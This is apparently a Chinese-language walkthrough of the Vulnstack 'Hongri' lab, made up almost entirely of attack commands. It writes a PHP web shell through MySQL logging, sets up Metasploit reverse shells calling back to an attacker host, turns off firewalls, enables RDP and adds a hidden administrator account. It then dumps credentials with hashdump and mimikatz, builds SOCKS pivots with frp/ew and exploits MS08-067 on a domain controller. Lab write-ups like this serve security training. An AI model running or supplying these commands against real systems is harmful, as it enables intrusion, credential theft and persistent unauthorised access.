红日靶机一

一、获取shell

show variables  like  '%general%'; #查看日志状态

当开启general时，所执行的sql语句都会出现在stu1.log文件中。那么，如果修改generallogfile的值，那么所执行的sql语句就会对应生成对应的文件中，进而getshell。SET GLOBAL general_log='on'

SHOW VARIABLES LIKE '%secure%'

SET GLOBAL general_log_file='C:/phpStudy/www/test1.php'          改变日志生成的地址

写入一句话

SELECT'<?php eval($_POST["cmd"]);?>'

cs上线

shell ipconfig

shell systeminfo

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf exploit(handler) > set lport 2222

lport =>2222msf exploit(handler) > exploit

getsystem提权成功

迁移进程

关闭防火墙

netsh firewall set opmode disable

获取密码
run hashdump

load mimikatz

wdigest

直接cs

netsh advfirewall set allprofiles state off

关墙

进行远程登录

开启3389

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

添加管理员账号

net user username password /add

net localgroup administrators username /add

net user bienao 123.com /add

net localgroup administrators bienao /add

65001 UTF-8代码页 解决乱码

chcp 65001

远程连接
rdesktop 192.168.44.128:3389

探测域内存活主机
run windows/gather/enum_ad_computers

添加路由

run autoroute -s 192.168.52.0/24

run autoroute -p

信息收集

判断域控

shell net view /domain

shell net time /domain

执行探测

for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i

arp -a  主机探测

nmap --script=vuln 192.168.52.141

nmap --script=vuln 192.168.52.138

frp 创建反向socks代理

修改frps.ini文件

vim frps.ini

启动frp

./frps -c frps.ini

frpc.exe -c frpc.ini

或者（ip不一样）

ew 创建反向socks代理

Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024

这条命令的意思是说让公网服务器监听1080和1024端口，等待攻击者机器访问1080端口，目标机器访问1024端口

windows: .ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024

proxychains代理

vi /etc/proxychains.conf

msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141

rhosts => 192.168.52.141

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > run

net user bienao 123.com /add  

net localgroup administrators bienao /add

netsh advfirewall set allprofiles state off  关墙

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f    开3389

远程连接

rdesktop 192.168.44.141:3389

远程失败

getuid

run hashdump

wdigest #获取系统账户信息

load mimikatz  #加载mimikatz

kerberos #获取明文

域控弹回CS

meterpreter > background

[*] Backgrounding session 2...

msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf5 exploit(windows/local/payload_inject) > set lport 1111

lport => 1111

msf5 exploit(windows/local/payload_inject) > set session 2

session => 2

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > run

参考学习

https://blog.csdn.net/qq_42349134/article/details/103135062

https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F